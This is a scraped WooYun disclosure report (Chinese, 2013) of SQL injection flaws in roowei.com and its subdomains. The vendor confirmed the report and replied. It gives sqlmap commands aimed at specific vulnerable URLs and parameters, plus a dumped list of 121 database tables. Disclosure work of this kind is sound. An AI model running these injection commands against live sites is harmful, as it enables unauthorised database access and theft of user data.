入围中国网商家第二次注入24W用户以及密码敏感信息泄露(注入大礼包)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-043419

漏洞标题：入围中国网商家第二次注入24W用户以及密码敏感信息泄露(注入大礼包)

漏洞作者： xlz0iza1

提交时间：2013-11-20 10:54

修复时间：2014-01-04 10:55

公开时间：2014-01-04 10:55

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-11-20：细节已通知厂商并且等待厂商处理中
2013-11-20：厂商已经确认，细节仅向厂商公开
2013-11-30：细节向核心白帽子及相关领域专家公开
2013-12-10：细节向普通白帽子公开
2013-12-20：细节向实习白帽子公开
2014-01-04：细节向公众公开

简要描述：

主站+分站多枚SQL注入.求20RANK+礼物。

详细说明：

#1:主站注入枚举

sqlmap.py -u "http://www.roowei.com/gg/comcount.php?action=up
_news&n_id=744538" --dbs

sqlmap.py -u "http://www.roowei.com/gg/comcount.php?action=up_jigou&u_id=190751 --dbs

http://www.roowei.com/gg/comcount.php?action=up_host&c_id=656034

n_id、u_id、c_id没有进行过滤。
#2:分站注入枚举

sqlmap.py -u "http://qingan.roowei.com/Search/?Keyword=&Level
=1&match=SPH_MATCH_ALL&Indexes=video&source=481&shendu=4&ac_parent=482" --dns

sqlmap.py -u "http://www.cn.roowei.com/Public/comcount.php?ac
tion=up_sell&s_id=413431" --dbs

sqlmap.py -u "http://sdlc.roowei.com/Search/?Keyword=&Level=1
&match=SPH_MATCH_ALL&Indexes=news&source=&shendu=4&ac_parent=8100" --dbs

sqlmap.py -u "http://jiawang.roowei.com/Search/?Keyword=&Leve
l=1&match=SPH_MATCH_ALL&Indexes=video&source=481&shendu=4&ac_parent=480" --dbs

下面这出没有检测,网速太卡了,无线网的孩子伤不起啊.
http://yushushi.roowei.com/Search/?Keyword=&Level=1&match=SPH_MATCH_ALL&Indexes=video&source=481&shendu=4&ac_parent=481

漏洞证明：

#1：主站注入测试

Database: roowei
[121 tables]
+---------------------------------+
| sl_admin                        |
| sl_admin_ads                    |
| sl_admin_ads_manage             |
| sl_admin_ads_page               |
| sl_admin_ads_type_manage        |
| sl_admin_article                |
| sl_admin_articlehits            |
| sl_admin_articlemycat           |
| sl_admin_articlepage            |
| sl_admin_industry_ads           |
| sl_admin_industry_webseo        |
| sl_admin_web_page               |
| sl_adminfailedlogin             |
| sl_admingroup                   |
| sl_admingroupmap                |
| sl_adminoperlog                 |
| sl_adminsection                 |
| sl_album_user                   |
| sl_backsession                  |
| sl_cacheback                    |
| sl_cachefront                   |
| sl_cachesearchback              |
| sl_cachesearchfront             |
| sl_ci_sessions                  |
| sl_classcontent                 |
| sl_cn_Advertising               |
| sl_cn_Comment                   |
| sl_cn_Photo                     |
| sl_cn_ads                       |
| sl_cn_ads1                      |
| sl_cn_ads_industry              |
| sl_cn_advertising_industry      |
| sl_cn_album                     |
| sl_cn_article                   |
| sl_cn_articlecatadgrmap         |
| sl_cn_articlecategory           |
| sl_cn_articlecatusgrmap         |
| sl_cn_articlecomment            |
| sl_cn_articlecontribution       |
| sl_cn_articlecounter            |
| sl_cn_articlehits               |
| sl_cn_articlehits1              |
| sl_cn_articleimg                |
| sl_cn_articleimg_copy           |
| sl_cn_articlemycat              |
| sl_cn_articlemycomment          |
| sl_cn_articlepage               |
| sl_cn_articlepage_copy          |
| sl_cn_classinfo                 |
| sl_cn_classinfoattr             |
| sl_cn_classinfocatadgmap        |
| sl_cn_classinfocatattrelement   |
| sl_cn_classinfocatgeory         |
| sl_cn_classinfocatusgmap        |
| sl_cn_classinfomember           |
| sl_cn_count                     |
| sl_cn_feedback                  |
| sl_cn_feedbacktadgmap           |
| sl_cn_feedbacktusgmap           |
| sl_cn_feedbacktype              |
| sl_cn_goods                     |
| sl_cn_goodscatadgrmap           |
| sl_cn_goodscategory             |
| sl_cn_goodscatusgrmap           |
| sl_cn_goodscomment              |
| sl_cn_goodsconsignee            |
| sl_cn_goodscounter              |
| sl_cn_goodsmycomment            |
| sl_cn_goodsorder                |
| sl_cn_goodsordergoods           |
| sl_cn_indexs                    |
| sl_cn_indexs_1                  |
| sl_cn_indexs_copy1              |
| sl_cn_industrie_manage          |
| sl_cn_industrie_nav             |
| sl_cn_industry_admin            |
| sl_cn_industry_website          |
| sl_cn_menu                      |
| sl_cn_message                   |
| sl_cn_module                    |
| sl_cn_module_choose             |
| sl_cn_module_choose_custom_text |
| sl_cn_module_manage             |
| sl_cn_payment                   |
| sl_cn_poll                      |
| sl_cn_polloption                |
| sl_cn_site                      |
| sl_cn_staticcontent             |
| sl_cn_territory                 |
| sl_cn_tradebuyvip               |
| sl_cn_tradecertificate          |
| sl_cn_tradecompany              |
| sl_cn_tradecompanyseo           |
| sl_cn_tradecorpindmap           |
| sl_cn_tradedomainname           |
| sl_cn_tradefavoritejobad        |
| sl_cn_tradefavoritejobseeker    |
| sl_cn_tradeindadgmap            |
| sl_cn_tradeindattrelement       |
| sl_cn_tradeindusgmap            |
| sl_cn_tradeindustry             |
| sl_cn_tradeindustry_data        |
| sl_cn_tradeinfo                 |
| sl_cn_tradeinfoattr             |
| sl_cn_tradeinfotype             |
| sl_cn_tradejobads               |
| sl_cn_tradejobcategory          |
| sl_cn_tradejobmap               |
| sl_cn_tradejobseeker            |
| sl_cn_tradelink                 |
| sl_cn_trademessage              |
| sl_cn_trademyproduct            |
| sl_cn_trademyproductcat         |
| sl_cn_tradeprocontri            |
| sl_cn_tradeproduct              |
| sl_cn_tradeproduct_content      |
| sl_cn_tradeproductattr          |
| sl_cn_tradeproducthist          |
| sl_cn_user_ads                  |
| sl_cn_user_hits                 |
| sl_cn_user_manageads            |
+---------------------------------+

#多个截图证明主站分站.

修复方案：

表示无力吐槽,2M的网,假设无线7个人用,o(︶︿︶)o 唉,熄灯的寝室你伤不起.

版权声明：转载请注明来源 xlz0iza1@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2013-11-20 15:18

厂商回复：

Thx.搜索注入的问题昨天在有位童鞋的反馈下已经处理了.主站的问题已转相应部门处理,非常感谢@xlz0iza1 对入围网安全的关注,谢谢.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-043419

漏洞标题：入围中国网商家第二次注入24W用户以及密码敏感信息泄露(注入大礼包)

相关厂商：roowei.com

漏洞作者： xlz0iza1

提交时间：2013-11-20 10:54

修复时间：2014-01-04 10:55

公开时间：2014-01-04 10:55

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xlz0iza1@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-043419

漏洞标题：入围中国网商家第二次注入24W用户以及密码敏感信息泄露(注入大礼包)

相关厂商：roowei.com

漏洞作者： xlz0iza1

提交时间：2013-11-20 10:54

修复时间：2014-01-04 10:55

公开时间：2014-01-04 10:55

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-043419"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xlz0iza1@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：